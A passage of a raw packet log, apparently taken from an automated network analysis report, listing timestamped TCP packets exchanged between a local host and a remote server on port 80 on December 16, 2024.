                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.649203062 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.649276018 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.649374962 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.650126934 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.650286913 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.650393963 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.651019096 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.651215076 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.651329994 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.651846886 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.652008057 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.652116060 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.652584076 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.652683020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.652805090 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.653352022 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.653455973 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.653561115 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.654263020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.654411077 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.654516935 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.655123949 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.655191898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.655436993 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.656011105 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.656083107 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.656183004 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.656898022 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.656985998 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.657104969 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.657748938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.657855988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.657958031 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.658663034 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.658699036 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.658808947 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.659678936 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.659719944 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.659831047 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.660429001 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.660545111 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.660640955 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.661272049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.661433935 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.661537886 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.662152052 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.662236929 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.662333965 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.663002014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.663126945 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.663219929 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.663911104 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.663930893 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.664062977 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.664735079 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.664913893 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.665016890 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.665957928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.666129112 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.666241884 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.666796923 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.666971922 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.667076111 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.667705059 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.667809963 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.667911053 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.668442965 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.668504953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.668597937 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.669122934 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.669193983 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.669295073 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.670284986 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.670337915 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.670473099 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.671137094 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.671216011 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.671329021 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.671931028 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.671982050 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.672075987 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.672636032 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.672769070 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.672863960 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.673511028 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.673559904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.673656940 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.674396992 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.674521923 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.674622059 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.675326109 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.675446987 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.675544977 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.676217079 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.676320076 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.676420927 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.676995993 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.677067995 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.677166939 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.677927017 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.678016901 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.678117037 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.678769112 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.678910971 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.679018974 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.679646015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.679812908 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.679908991 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.680515051 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.694091082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.694103956 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.694258928 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.694436073 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.694521904 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.694583893 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.695327997 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.695403099 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.695487022 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.696386099 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.696470022 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.696472883 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.697211027 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.697288036 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.697314024 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.697973013 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.698055983 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.698122025 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.698823929 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.698882103 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.698908091 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.746563911 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.832871914 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.832957983 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.833096981 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.833271027 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.833343983 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.833445072 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.834183931 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.834223032 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.834322929 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.835052967 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.835113049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.835210085 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.835908890 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.836023092 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.836137056 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.836783886 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.836939096 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.837070942 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.837670088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.837760925 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.837863922 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.838530064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.838648081 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.838747025 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.839417934 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.839509010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.839610100 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.840313911 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.840394020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.840511084 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.841198921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.841315985 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.841414928 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.842061043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.842200994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.842302084 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.842992067 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.843075037 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.843169928 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.843796015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.843949080 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.844049931 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.844679117 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.844815016 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.844912052 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.845655918 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.845765114 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.845870018 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.846417904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.846537113 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.846640110 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.847310066 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.847409010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.847512960 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.848232031 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.848572016 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.848669052 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.849392891 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.849490881 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.849594116 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.850383997 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.850507975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.850610018 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.851358891 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.851464987 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.851566076 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.852200031 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.852282047 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.852379084 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.853030920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.853070974 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.853174925 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.853880882 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.853992939 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.854093075 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.854789972 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.854902029 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.855000973 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.855633974 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.855736971 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.855833054 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.856177092 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.856250048 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.856348991 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.857053041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.857110023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.857208967 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.857822895 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.857929945 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.858027935 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.858696938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.858901978 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.859003067 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.859592915 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.859704018 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.859802961 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.860457897 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.860582113 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.860675097 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.861475945 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.861515045 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.861613035 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.862242937 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.862406015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.862507105 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.863152981 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.863203049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.863358021 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.864203930 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.864411116 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.864516973 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.865072966 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.865206003 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.865308046 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.865775108 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.865902901 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.866000891 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.866600037 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.866709948 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.866805077 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.867476940 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.867558002 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.867656946 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.868618011 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.868630886 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.868747950 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.869242907 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.869527102 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.869626999 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.870253086 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.870449066 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.870546103 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.871260881 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.871390104 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.871495008 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.872417927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.872514963 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.872618914 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.873491049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.886584044 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.886682987 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.886744976 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.886924028 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.887011051 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.887110949 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.887774944 CET8049723185.81.68.147192.168.2.10
